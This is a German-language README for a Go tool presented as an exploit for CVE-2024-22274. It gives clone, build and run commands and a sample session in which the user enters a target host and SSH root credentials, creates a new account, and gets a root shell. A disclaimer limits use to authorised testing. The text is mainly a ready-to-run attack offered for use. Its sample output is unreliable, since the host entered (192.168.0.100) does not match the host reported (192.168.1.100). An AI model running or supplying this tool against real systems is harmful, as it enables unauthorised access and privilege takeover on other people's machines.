
Go-basierter Exploit für CVE-2024-22274, der über SSH einen neuen Benutzer erstellt und eine Root-Shell auf dem Zielrechner für autorisierte Penetrationstests bereitstellt.
Dieses Repository enthält einen Exploit für CVE-2024-22274. Der Exploit erstellt einen neuen Benutzer auf einem entfernten Rechner über SSH und stellt anschließend eine Root-Shell bereit.
Klone das Repository:
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
cd CVE-2024-22274-RCE
Installiere die erforderlichen Pakete:
go mod init cve-2024-22274
go mod tidy
go get golang.org/x/crypto/ssh
go get golang.org/x/term
Kompiliere das Go-Programm:
go build -o cve-2024-22274-rce main.go
Führe das kompilierte Programm aus:
./cve-2024-22274-rce
Folge den Eingabeaufforderungen:
Nachdem der Benutzer erstellt wurde, erhältst du eine Root-Shell auf dem Zielrechner. Du kannst Befehle als neuer Benutzer ausführen.
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit):
Haftungsausschluss Dieser Code dient ausschließlich zu Bildungszwecken. Verwende ihn verantwortungsbewusst und nur auf Systemen, für die du eine Testberechtigung hast.
Lizenz Dieses Projekt ist unter der MIT-Lizenz lizenziert – weitere Details findest du in der LICENSE-Datei.